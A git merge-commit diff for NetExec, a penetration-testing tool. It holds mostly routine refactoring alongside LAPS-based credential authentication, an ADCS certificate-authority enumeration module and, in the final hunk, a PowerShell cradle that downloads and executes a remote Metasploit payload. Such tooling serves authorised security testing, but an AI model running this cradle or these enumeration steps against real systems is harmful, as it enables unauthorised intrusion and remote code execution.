Merge branch main into neff-ldap-domain
commit
45b02250e6
|
@ -3,6 +3,7 @@ hash_spider_default.sqlite3
|
|||
*.bak
|
||||
*.log
|
||||
.venv
|
||||
pyvenv.cfg
|
||||
.vscode
|
||||
.idea
|
||||
# Byte-compiled / optimized / DLL files
|
||||
|
|
10
README.md
10
README.md
|
@ -1,4 +1,4 @@
|
|||
![Supported Python versions](https://img.shields.io/badge/python-3.7+-blue.svg)
|
||||
![Supported Python versions](https://img.shields.io/badge/python-3.8+-blue.svg)
|
||||
[![Twitter](https://img.shields.io/twitter/follow/al3xn3ff?label=al3x_n3ff&style=social)](https://twitter.com/intent/follow?screen_name=al3x_n3ff)
|
||||
[![Twitter](https://img.shields.io/twitter/follow/_zblurx?label=_zblurx&style=social)](https://twitter.com/intent/follow?screen_name=_zblurx)
|
||||
[![Twitter](https://img.shields.io/twitter/follow/MJHallenbeck?label=MJHallenbeck&style=social)](https://twitter.com/intent/follow?screen_name=MJHallenbeck)
|
||||
|
@ -21,7 +21,7 @@ Going forward, our intent is to maintain a community-driven and maintained proje
|
|||
|
||||
You are on the **latest up-to-date** repository of the project NetExec (nxc) ! 🎉
|
||||
|
||||
- 🚧 If you want to report a problem, open un [Issue](https://github.com/Pennyw0rth/NetExec/issues)
|
||||
- 🚧 If you want to report a problem, open an [Issue](https://github.com/Pennyw0rth/NetExec/issues)
|
||||
- 🔀 If you want to contribute, open a [Pull Request](https://github.com/Pennyw0rth/NetExec/pulls)
|
||||
- 💬 If you want to discuss, open a [Discussion](https://github.com/Pennyw0rth/NetExec/discussions)
|
||||
|
||||
|
@ -37,6 +37,12 @@ See the project's [wiki](https://netexec.wiki/) (in development) for documentati
|
|||
# Installation
|
||||
Please see the installation instructions on the [wiki](https://netexec.wiki/getting-started/installation) (in development)
|
||||
|
||||
## Linux
|
||||
```
|
||||
sudo apt install pipx git
|
||||
pipx ensurepath
|
||||
pipx install git+https://github.com/Pennyw0rth/NetExec
|
||||
```
|
||||
# Development
|
||||
Development guidelines and recommendations in development
|
||||
|
||||
|
|
|
@ -13,6 +13,12 @@ a = Analysis(
|
|||
('./nxc/modules', 'nxc/modules')
|
||||
],
|
||||
hiddenimports=[
|
||||
'aardwolf',
|
||||
'aardwolf.connection',
|
||||
'aardwolf.commons.queuedata.constants',
|
||||
'aardwolf.commons.iosettings',
|
||||
'aardwolf.commons.target',
|
||||
'aardwolf.protocol.x224.constants',
|
||||
'impacket.examples.secretsdump',
|
||||
'impacket.dcerpc.v5.lsat',
|
||||
'impacket.dcerpc.v5.transport',
|
||||
|
@ -65,6 +71,7 @@ a = Analysis(
|
|||
'dploot.lib.smb',
|
||||
'pyasn1_modules.rfc5652',
|
||||
'unicrypto.backends.pycryptodomex',
|
||||
'sspilib.raw._text',
|
||||
],
|
||||
hookspath=['./nxc/.hooks'],
|
||||
runtime_hooks=[],
|
||||
|
|
30
nxc/cli.py
30
nxc/cli.py
|
@ -1,6 +1,12 @@
|
|||
import argparse
|
||||
import argcomplete
|
||||
import sys
|
||||
from argparse import RawTextHelpFormatter
|
||||
from os import listdir
|
||||
from os.path import dirname
|
||||
from os.path import join as path_join
|
||||
import nxc
|
||||
from nxc.paths import NXC_PATH
|
||||
from nxc.loaders.protocolloader import ProtocolLoader
|
||||
from nxc.helpers.logger import highlight
|
||||
from nxc.logger import nxc_logger
|
||||
|
@ -11,11 +17,11 @@ def gen_cli_args():
|
|||
VERSION = importlib.metadata.version("netexec")
|
||||
CODENAME = "nxc4u"
|
||||
|
||||
parser = argparse.ArgumentParser(description=f"""
|
||||
parser = argparse.ArgumentParser(description=rf"""
|
||||
. .
|
||||
.| |. _ _ _ _____
|
||||
|| || | \ | | ___ | |_ | ____| __ __ ___ ___
|
||||
\\\( )// | \| | / _ \ | __| | _| \ \/ / / _ \ / __|
|
||||
\\( )// | \| | / _ \ | __| | _| \ \/ / / _ \ / __|
|
||||
.=[ ]=. | |\ | | __/ | |_ | |___ > < | __/ | (__
|
||||
/ /ॱ-ॱ\ \ |_| \_| \___| \__| |_____| /_/\_\ \___| \___|
|
||||
ॱ \ / ॱ
|
||||
|
@ -41,7 +47,7 @@ def gen_cli_args():
|
|||
# we do module arg parsing here so we can reference the module_list attribute below
|
||||
module_parser = argparse.ArgumentParser(add_help=False)
|
||||
mgroup = module_parser.add_mutually_exclusive_group()
|
||||
mgroup.add_argument("-M", "--module", action="append", metavar="MODULE", help="module to use")
|
||||
mgroup.add_argument("-M", "--module", choices=get_module_names(), action="append", metavar="MODULE", help="module to use")
|
||||
module_parser.add_argument("-o", metavar="MODULE_OPTION", nargs="+", default=[], dest="module_options", help="module options")
|
||||
module_parser.add_argument("-L", "--list-modules", action="store_true", help="list available modules")
|
||||
module_parser.add_argument("--options", dest="show_module_options", action="store_true", help="display module options")
|
||||
|
@ -81,14 +87,28 @@ def gen_cli_args():
|
|||
except Exception as e:
|
||||
nxc_logger.exception(f"Error loading proto_args from proto_args.py file in protocol folder: {protocol} - {e}")
|
||||
|
||||
argcomplete.autocomplete(parser)
|
||||
args = parser.parse_args()
|
||||
|
||||
if len(sys.argv) == 1:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.version:
|
||||
print(f"{VERSION} - {CODENAME}")
|
||||
sys.exit(1)
|
||||
|
||||
return args
|
||||
|
||||
|
||||
def get_module_names():
|
||||
"""Get module names without initializing them"""
|
||||
modules = []
|
||||
modules_paths = [
|
||||
path_join(dirname(nxc.__file__), "modules"),
|
||||
path_join(NXC_PATH, "modules"),
|
||||
]
|
||||
|
||||
for path in modules_paths:
|
||||
modules.extend([module[:-3] for module in listdir(path) if module[-3:] == ".py" and module != "example_module.py"])
|
||||
return sorted(modules, key=str.casefold)
|
||||
|
|
|
@ -43,5 +43,5 @@ if len(host_info_colors) != 4:
|
|||
|
||||
# this should probably be put somewhere else, but if it's in the config helpers, there is a circular import
|
||||
def process_secret(text):
|
||||
hidden = text[:reveal_chars_of_pwd]
|
||||
return text if not audit_mode else hidden + audit_mode * 8
|
||||
reveal = text[:reveal_chars_of_pwd]
|
||||
return text if not audit_mode else reveal + (audit_mode if len(audit_mode) > 1 else audit_mode * 8)
|
||||
|
|
|
@ -10,6 +10,7 @@ from nxc.config import pwned_label
|
|||
from nxc.helpers.logger import highlight
|
||||
from nxc.logger import nxc_logger, NXCAdapter
|
||||
from nxc.context import Context
|
||||
from nxc.protocols.ldap.laps import laps_search
|
||||
|
||||
from impacket.dcerpc.v5 import transport
|
||||
import sys
|
||||
|
@ -86,8 +87,8 @@ class connection:
|
|||
self.port = self.args.port
|
||||
self.conn = None
|
||||
self.admin_privs = False
|
||||
self.password = ""
|
||||
self.username = ""
|
||||
self.password = None
|
||||
self.username = None
|
||||
self.kerberos = bool(self.args.kerberos or self.args.use_kcache or self.args.aesKey)
|
||||
self.aesKey = None if not self.args.aesKey else self.args.aesKey[0]
|
||||
self.kdcHost = None if not self.args.kdcHost else self.args.kdcHost
|
||||
|
@ -459,6 +460,13 @@ class connection:
|
|||
self.logger.info("Successfully authenticated using Kerberos cache")
|
||||
return True
|
||||
|
||||
if hasattr(self.args, "laps") and self.args.laps:
|
||||
self.logger.debug("Trying to authenticate using LAPS")
|
||||
username[0], secret[0], domain[0], ntlm_hash = laps_search(self, username, secret, cred_type, domain)
|
||||
cred_type = ["plaintext"]
|
||||
if not (username[0] or secret[0] or domain[0]):
|
||||
return False
|
||||
|
||||
if not self.args.no_bruteforce:
|
||||
for secr_index, secr in enumerate(secret):
|
||||
for user_index, user in enumerate(username):
|
||||
|
|
|
@ -0,0 +1,97 @@
|
|||
import sys
|
||||
import configparser
|
||||
import shutil
|
||||
from sqlalchemy import create_engine
|
||||
from sqlite3 import connect
|
||||
from os import mkdir
|
||||
from os.path import exists
|
||||
from os.path import join as path_join
|
||||
|
||||
from nxc.loaders.protocolloader import ProtocolLoader
|
||||
from nxc.paths import WORKSPACE_DIR
|
||||
|
||||
|
||||
def create_db_engine(db_path):
|
||||
return create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
|
||||
|
||||
|
||||
def open_config(config_path):
|
||||
try:
|
||||
config = configparser.ConfigParser()
|
||||
config.read(config_path)
|
||||
except Exception as e:
|
||||
print(f"[-] Error reading nxc.conf: {e}")
|
||||
sys.exit(1)
|
||||
return config
|
||||
|
||||
|
||||
def get_workspace(config):
|
||||
return config.get("nxc", "workspace")
|
||||
|
||||
|
||||
def set_workspace(config_path, workspace_name):
|
||||
config = open_config(config_path)
|
||||
config.set("nxc", "workspace", workspace_name)
|
||||
write_configfile(config, config_path)
|
||||
print(f"[*] Workspace set to {workspace_name}")
|
||||
|
||||
|
||||
def get_db(config):
|
||||
return config.get("nxc", "last_used_db")
|
||||
|
||||
|
||||
def write_configfile(config, config_path):
|
||||
with open(config_path, "w") as configfile:
|
||||
config.write(configfile)
|
||||
|
||||
|
||||
def create_workspace(workspace_name, p_loader=None):
|
||||
"""
|
||||
Create a new workspace with the given name.
|
||||
|
||||
Args:
|
||||
----
|
||||
workspace_name (str): The name of the workspace.
|
||||
|
||||
Returns:
|
||||
-------
|
||||
None
|
||||
"""
|
||||
if exists(path_join(WORKSPACE_DIR, workspace_name)):
|
||||
print(f"[-] Workspace {workspace_name} already exists")
|
||||
else:
|
||||
print(f"[*] Creating {workspace_name} workspace")
|
||||
mkdir(path_join(WORKSPACE_DIR, workspace_name))
|
||||
|
||||
if p_loader is None:
|
||||
p_loader = ProtocolLoader()
|
||||
protocols = p_loader.get_protocols()
|
||||
|
||||
for protocol in protocols:
|
||||
protocol_object = p_loader.load_protocol(protocols[protocol]["dbpath"])
|
||||
proto_db_path = path_join(WORKSPACE_DIR, workspace_name, f"{protocol}.db")
|
||||
|
||||
if not exists(proto_db_path):
|
||||
print(f"[*] Initializing {protocol.upper()} protocol database")
|
||||
conn = connect(proto_db_path)
|
||||
c = conn.cursor()
|
||||
|
||||
# try to prevent some weird sqlite I/O errors
|
||||
c.execute("PRAGMA journal_mode = OFF")
|
||||
c.execute("PRAGMA foreign_keys = 1")
|
||||
|
||||
protocol_object.database.db_schema(c)
|
||||
|
||||
# commit the changes and close everything off
|
||||
conn.commit()
|
||||
conn.close()
|
||||
|
||||
|
||||
def delete_workspace(workspace_name):
|
||||
shutil.rmtree(path_join(WORKSPACE_DIR, workspace_name))
|
||||
print(f"[*] Workspace {workspace_name} deleted")
|
||||
|
||||
|
||||
def initialize_db():
|
||||
if not exists(path_join(WORKSPACE_DIR, "default")):
|
||||
create_workspace("default")
|
|
@ -3,7 +3,7 @@ from os.path import exists
|
|||
from os.path import join as path_join
|
||||
import shutil
|
||||
from nxc.paths import NXC_PATH, CONFIG_PATH, TMP_PATH, DATA_PATH
|
||||
from nxc.nxcdb import initialize_db
|
||||
from nxc.database import initialize_db
|
||||
from nxc.logger import nxc_logger
|
||||
|
||||
|
||||
|
@ -29,7 +29,7 @@ def first_run_setup(logger=nxc_logger):
|
|||
logger.display(f"Creating missing folder {folder}")
|
||||
mkdir(path_join(NXC_PATH, folder))
|
||||
|
||||
initialize_db(logger)
|
||||
initialize_db()
|
||||
|
||||
if not exists(CONFIG_PATH):
|
||||
logger.display("Copying default configuration file")
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
# Original from here: https://github.com/fortra/impacket/blob/master/examples/DumpNTLMInfo.py#L568
|
||||
|
||||
import struct
|
||||
|
||||
from impacket import ntlm
|
||||
from impacket.smb3 import WIN_VERSIONS
|
||||
import contextlib
|
||||
|
||||
|
||||
def parse_challenge(challange):
|
||||
target_info = {
|
||||
"hostname": None,
|
||||
"domain": None,
|
||||
"os_version": None
|
||||
}
|
||||
challange = ntlm.NTLMAuthChallenge(challange)
|
||||
av_pairs = ntlm.AV_PAIRS(challange["TargetInfoFields"][:challange["TargetInfoFields_len"]])
|
||||
if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME] is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
target_info["hostname"] = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode("utf-16le")
|
||||
if av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME] is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
target_info["domain"] = av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1].decode("utf-16le")
|
||||
if "Version" in challange.fields:
|
||||
version = challange["Version"]
|
||||
if len(version) >= 4:
|
||||
major_version = version[0]
|
||||
minor_version = version[1]
|
||||
product_build = struct.unpack("<H", version[2:4])[0]
|
||||
if product_build in WIN_VERSIONS:
|
||||
target_info["os_version"] = f"{WIN_VERSIONS[product_build]} Build {product_build}"
|
||||
else:
|
||||
target_info["os_version"] = f"{major_version}.{minor_version} Build {product_build}"
|
||||
return target_info
|
|
@ -24,6 +24,9 @@ class ModuleLoader:
|
|||
if not hasattr(module, "name"):
|
||||
self.logger.fail(f"{module_path} missing the name variable")
|
||||
module_error = True
|
||||
elif hasattr(module, "name") and module.name != module_path.split("/")[-1].split("\\")[-1][:-3]:
|
||||
self.logger.fail(f"{module_path} filename must match the module name {module.name}")
|
||||
module_error = True
|
||||
elif not hasattr(module, "description"):
|
||||
self.logger.fail(f"{module_path} missing the description variable")
|
||||
module_error = True
|
||||
|
|
|
@ -4,7 +4,6 @@ from logging.handlers import RotatingFileHandler
|
|||
import os.path
|
||||
import sys
|
||||
import re
|
||||
from nxc.helpers.misc import called_from_cmd_args
|
||||
from nxc.console import nxc_console
|
||||
from termcolor import colored
|
||||
from datetime import datetime
|
||||
|
@ -68,12 +67,6 @@ class NXCAdapter(logging.LoggerAdapter):
|
|||
|
||||
def display(self, msg, *args, **kwargs):
|
||||
"""Display text to console, formatted for nxc"""
|
||||
try:
|
||||
if self.extra and "protocol" in self.extra and not called_from_cmd_args():
|
||||
return
|
||||
except AttributeError:
|
||||
pass
|
||||
|
||||
msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs)
|
||||
text = Text.from_ansi(msg)
|
||||
nxc_console.print(text, *args, **kwargs)
|
||||
|
@ -81,12 +74,6 @@ class NXCAdapter(logging.LoggerAdapter):
|
|||
|
||||
def success(self, msg, color="green", *args, **kwargs):
|
||||
"""Print some sort of success to the user"""
|
||||
try:
|
||||
if self.extra and "protocol" in self.extra and not called_from_cmd_args():
|
||||
return
|
||||
except AttributeError:
|
||||
pass
|
||||
|
||||
msg, kwargs = self.format(f"{colored('[+]', color, attrs=['bold'])} {msg}", kwargs)
|
||||
text = Text.from_ansi(msg)
|
||||
nxc_console.print(text, *args, **kwargs)
|
||||
|
@ -94,12 +81,6 @@ class NXCAdapter(logging.LoggerAdapter):
|
|||
|
||||
def highlight(self, msg, *args, **kwargs):
|
||||
"""Prints a completely yellow highlighted message to the user"""
|
||||
try:
|
||||
if self.extra and "protocol" in self.extra and not called_from_cmd_args():
|
||||
return
|
||||
except AttributeError:
|
||||
pass
|
||||
|
||||
msg, kwargs = self.format(f"{colored(msg, 'yellow', attrs=['bold'])}", kwargs)
|
||||
text = Text.from_ansi(msg)
|
||||
nxc_console.print(text, *args, **kwargs)
|
||||
|
@ -107,11 +88,6 @@ class NXCAdapter(logging.LoggerAdapter):
|
|||
|
||||
def fail(self, msg, color="red", *args, **kwargs):
|
||||
"""Prints a failure (may or may not be an error) - e.g. login creds didn't work"""
|
||||
try:
|
||||
if self.extra and "protocol" in self.extra and not called_from_cmd_args():
|
||||
return
|
||||
except AttributeError:
|
||||
pass
|
||||
msg, kwargs = self.format(f"{colored('[-]', color, attrs=['bold'])} {msg}", kwargs)
|
||||
text = Text.from_ansi(msg)
|
||||
nxc_console.print(text, *args, **kwargs)
|
||||
|
|
|
@ -65,7 +65,7 @@ WELL_KNOWN_SIDS = {
|
|||
"S-1-5-64-14": "SChannel Authentication",
|
||||
"S-1-5-64-21": "Digest Authority",
|
||||
"S-1-5-80": "NT Service",
|
||||
"S-1-5-83-0": "NT VIRTUAL MACHINE\Virtual Machines",
|
||||
"S-1-5-83-0": "NT VIRTUAL MACHINE\\Virtual Machines",
|
||||
"S-1-16-0": "Untrusted Mandatory Level",
|
||||
"S-1-16-4096": "Low Mandatory Level",
|
||||
"S-1-16-8192": "Medium Mandatory Level",
|
||||
|
@ -74,24 +74,24 @@ WELL_KNOWN_SIDS = {
|
|||
"S-1-16-16384": "System Mandatory Level",
|
||||
"S-1-16-20480": "Protected Process Mandatory Level",
|
||||
"S-1-16-28672": "Secure Process Mandatory Level",
|
||||
"S-1-5-32-554": "BUILTIN\Pre-Windows 2000 Compatible Access",
|
||||
"S-1-5-32-555": "BUILTIN\Remote Desktop Users",
|
||||
"S-1-5-32-557": "BUILTIN\Incoming Forest Trust Builders",
|
||||
"S-1-5-32-554": "BUILTIN\\Pre-Windows 2000 Compatible Access",
|
||||
"S-1-5-32-555": "BUILTIN\\Remote Desktop Users",
|
||||
"S-1-5-32-557": "BUILTIN\\Incoming Forest Trust Builders",
|
||||
"S-1-5-32-556": "BUILTIN\\Network Configuration Operators",
|
||||
"S-1-5-32-558": "BUILTIN\Performance Monitor Users",
|
||||
"S-1-5-32-559": "BUILTIN\Performance Log Users",
|
||||
"S-1-5-32-560": "BUILTIN\Windows Authorization Access Group",
|
||||
"S-1-5-32-561": "BUILTIN\Terminal Server License Servers",
|
||||
"S-1-5-32-562": "BUILTIN\Distributed COM Users",
|
||||
"S-1-5-32-569": "BUILTIN\Cryptographic Operators",
|
||||
"S-1-5-32-573": "BUILTIN\Event Log Readers",
|
||||
"S-1-5-32-574": "BUILTIN\Certificate Service DCOM Access",
|
||||
"S-1-5-32-575": "BUILTIN\RDS Remote Access Servers",
|
||||
"S-1-5-32-576": "BUILTIN\RDS Endpoint Servers",
|
||||
"S-1-5-32-577": "BUILTIN\RDS Management Servers",
|
||||
"S-1-5-32-578": "BUILTIN\Hyper-V Administrators",
|
||||
"S-1-5-32-579": "BUILTIN\Access Control Assistance Operators",
|
||||
"S-1-5-32-580": "BUILTIN\Remote Management Users",
|
||||
"S-1-5-32-558": "BUILTIN\\Performance Monitor Users",
|
||||
"S-1-5-32-559": "BUILTIN\\Performance Log Users",
|
||||
"S-1-5-32-560": "BUILTIN\\Windows Authorization Access Group",
|
||||
"S-1-5-32-561": "BUILTIN\\Terminal Server License Servers",
|
||||
"S-1-5-32-562": "BUILTIN\\Distributed COM Users",
|
||||
"S-1-5-32-569": "BUILTIN\\Cryptographic Operators",
|
||||
"S-1-5-32-573": "BUILTIN\\Event Log Readers",
|
||||
"S-1-5-32-574": "BUILTIN\\Certificate Service DCOM Access",
|
||||
"S-1-5-32-575": "BUILTIN\\RDS Remote Access Servers",
|
||||
"S-1-5-32-576": "BUILTIN\\RDS Endpoint Servers",
|
||||
"S-1-5-32-577": "BUILTIN\\RDS Management Servers",
|
||||
"S-1-5-32-578": "BUILTIN\\Hyper-V Administrators",
|
||||
"S-1-5-32-579": "BUILTIN\\Access Control Assistance Operators",
|
||||
"S-1-5-32-580": "BUILTIN\\Remote Management Users",
|
||||
}
|
||||
|
||||
|
||||
|
@ -516,6 +516,8 @@ class NXCModule:
|
|||
# If a principal has been specified, only the ACE where he is the trustee will be printed
|
||||
for parsed_ace in parsed_dacl:
|
||||
print_ace = True
|
||||
context.log.debug(f"{parsed_ace=}, {self.rights=}, {self.rights_guid=}, {self.ace_type=}, {self.principal_sid=}")
|
||||
|
||||
# Filter on specific rights
|
||||
if self.rights is not None:
|
||||
try:
|
||||
|
@ -528,7 +530,7 @@ class NXCModule:
|
|||
if (self.rights == "ResetPassword") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace["Object type (GUID)"])):
|
||||
print_ace = False
|
||||
except Exception as e:
|
||||
context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
context.log.debug(f"Error filtering with {parsed_ace=} and {self.rights=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
|
||||
# Filter on specific right GUID
|
||||
if self.rights_guid is not None:
|
||||
|
@ -536,7 +538,7 @@ class NXCModule:
|
|||
if ("Object type (GUID)" not in parsed_ace) or (self.rights_guid not in parsed_ace["Object type (GUID)"]):
|
||||
print_ace = False
|
||||
except Exception as e:
|
||||
context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
context.log.debug(f"Error filtering with {parsed_ace=} and {self.rights_guid=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
|
||||
# Filter on ACE type
|
||||
if self.ace_type == "allowed":
|
||||
|
@ -544,13 +546,13 @@ class NXCModule:
|
|||
if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"]):
|
||||
print_ace = False
|
||||
except Exception as e:
|
||||
context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
context.log.debug(f"Error filtering with {parsed_ace=} and {self.ace_type=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
else:
|
||||
try:
|
||||
if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"]):
|
||||
print_ace = False
|
||||
except Exception as e:
|
||||
context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
context.log.debug(f"Error filtering with {parsed_ace=} and {self.ace_type=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
|
||||
# Filter on trusted principal
|
||||
if self.principal_sid is not None:
|
||||
|
@ -558,7 +560,7 @@ class NXCModule:
|
|||
if self.principal_sid not in parsed_ace["Trustee (SID)"]:
|
||||
print_ace = False
|
||||
except Exception as e:
|
||||
context.log.fail(f"Error filtering ACE, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
context.log.debug(f"Error filtering with {parsed_ace=} and {self.principal_sid=}, probably because of ACE type unsupported for parsing yet ({e})")
|
||||
if print_ace:
|
||||
self.context.log.highlight("%-28s" % "ACE[%d] info" % i)
|
||||
self.print_parsed_ace(parsed_ace)
|
||||
|
|
|
@ -0,0 +1,106 @@
|
|||
from impacket.dcerpc.v5 import transport, epm
|
||||
from impacket.http import AUTH_NTLM
|
||||
from impacket.dcerpc.v5.rpch import RPC_PROXY_INVALID_RPC_PORT_ERR, \
|
||||
RPC_PROXY_CONN_A1_0X6BA_ERR, RPC_PROXY_CONN_A1_404_ERR, \
|
||||
RPC_PROXY_RPC_OUT_DATA_404_ERR
|
||||
from impacket import uuid
|
||||
import requests
|
||||
|
||||
|
||||
class NXCModule:
|
||||
"""
|
||||
-------
|
||||
Module by @0xjbb, original code from Impacket rpcdump.py
|
||||
"""
|
||||
KNOWN_PROTOCOLS = {
|
||||
135: {"bindstr": r"ncacn_ip_tcp:%s[135]"},
|
||||
139: {"bindstr": r"ncacn_np:%s[\pipe\epmapper]"},
|
||||
443: {"bindstr": r"ncacn_http:[593,RpcProxy=%s:443]"},
|
||||
445: {"bindstr": r"ncacn_np:%s[\pipe\epmapper]"},
|
||||
593: {"bindstr": r"ncacn_http:%s"}
|
||||
}
|
||||
|
||||
name = "enum_ca"
|
||||
description = "Anonymously uses RPC endpoints to hunt for ADCS CAs"
|
||||
supported_protocols = ["smb"] # Example: ['smb', 'mssql']
|
||||
opsec_safe = True # Does the module touch disk?
|
||||
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
|
||||
|
||||
def __init__(self, context=None, module_options=None):
|
||||
self.context = context
|
||||
self.module_options = module_options
|
||||
|
||||
def options(self, context, module_options):
|
||||
pass
|
||||
|
||||
def on_login(self, context, connection):
|
||||
self.__username = connection.username
|
||||
self.__password = connection.password
|
||||
self.__domain = connection.domain
|
||||
self.__lmhash = ""
|
||||
self.__nthash = ""
|
||||
self.__port = 135.
|
||||
self.__stringbinding = ""
|
||||
|
||||
if context.hash and ":" in context.hash[0]:
|
||||
hashList = context.hash[0].split(":")
|
||||
self.__nthash = hashList[-1]
|
||||
self.__lmhash = hashList[0]
|
||||
elif context.hash and ":" not in context.hash[0]:
|
||||
self.__nthash = context.hash[0]
|
||||
self.__lmhash = "00000000000000000000000000000000"
|
||||
|
||||
self.__stringbinding = self.KNOWN_PROTOCOLS[self.__port]["bindstr"] % connection.host
|
||||
context.log.debug(f"StringBinding {self.__stringbinding}")
|
||||
|
||||
rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)
|
||||
|
||||
if self.__port in [139, 445]:
|
||||
# Setting credentials for SMB
|
||||
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
|
||||
rpctransport.setRemoteHost(connection.host)
|
||||
rpctransport.set_dport(self.__port)
|
||||
elif self.__port in [443]:
|
||||
# Setting credentials only for RPC Proxy, but not for the MSRPC level
|
||||
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
|
||||
rpctransport.set_auth_type(AUTH_NTLM)
|
||||
else:
|
||||
pass
|
||||
|
||||
try:
|
||||
entries = self.__fetchList(rpctransport)
|
||||
except Exception as e:
|
||||
error_text = f"Protocol failed: {e}"
|
||||
context.log.fail(error_text)
|
||||
|
||||
if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or \
|
||||
RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or \
|
||||
RPC_PROXY_CONN_A1_404_ERR in error_text or \
|
||||
RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:
|
||||
context.log.fail("This usually means the target does not allow "
|
||||
"to connect to its epmapper using RpcProxy.")
|
||||
return
|
||||
for entry in entries:
|
||||
tmpUUID = str(entry["tower"]["Floors"][0])
|
||||
|
||||
if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18] in epm.KNOWN_UUIDS:
|
||||
exename = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18]]
|
||||
context.log.debug("EXEs %s" % exename)
|
||||
if exename == "certsrv.exe":
|
||||
context.log.highlight("Active Directory Certificate Services Found.")
|
||||
url = f"http://{connection.host}/certsrv/certfnsh.asp"
|
||||
context.log.highlight(url)
|
||||
try:
|
||||
response = requests.get(url, timeout=5)
|
||||
if response.status_code == 401 and "WWW-Authenticate" in response.headers and "ntlm" in response.headers["WWW-Authenticate"].lower():
|
||||
context.log.highlight("Web enrollment found on HTTP (ESC8).")
|
||||
except requests.RequestException as e:
|
||||
context.log.debug(e)
|
||||
return
|
||||
|
||||
def __fetchList(self, rpctransport):
|
||||
dce = rpctransport.get_dce_rpc()
|
||||
dce.connect()
|
||||
resp = epm.hept_lookup(None, dce=dce)
|
||||
dce.disconnect()
|
||||
return resp
|
|
@ -17,12 +17,11 @@ class NXCModule:
|
|||
pass
|
||||
|
||||
def on_login(self, context, connection):
|
||||
domain_dn = ",".join(["DC=" + dc for dc in connection.domain.split(".")])
|
||||
search_filter = "(&(objectClass=trustedDomain))"
|
||||
attributes = ["flatName", "trustPartner", "trustDirection", "trustAttributes"]
|
||||
|
||||
context.log.debug(f"Search Filter={search_filter}")
|
||||
resp = connection.ldapConnection.search(searchBase=domain_dn, searchFilter=search_filter, attributes=attributes, sizeLimit=0)
|
||||
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
|
||||
|
||||
trusts = []
|
||||
context.log.debug(f"Total of records returned {len(resp)}")
|
|
@ -31,7 +31,7 @@ class NXCModule:
|
|||
self.MINLENGTH = module_options["MINLENGTH"]
|
||||
if "PASSWORDPOLICY" in module_options:
|
||||
self.PASSWORDPOLICY = True
|
||||
self.regex = re.compile("((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
|
||||
self.regex = re.compile(r"((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
|
||||
|
||||
def on_login(self, context, connection):
|
||||
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
||||
|
|
|
@ -37,7 +37,7 @@ class NXCModule:
|
|||
|
||||
def on_admin_login(self, context, connection):
|
||||
if not self.ca:
|
||||
context.log.fail("Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
|
||||
context.log.fail(r"Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
|
||||
return False
|
||||
|
||||
host = connection.host
|
||||
|
|
|
@ -56,7 +56,7 @@ class NXCModule:
|
|||
# stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
|
||||
command = """$url="{}://{}:{}/{}"
|
||||
$DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
|
||||
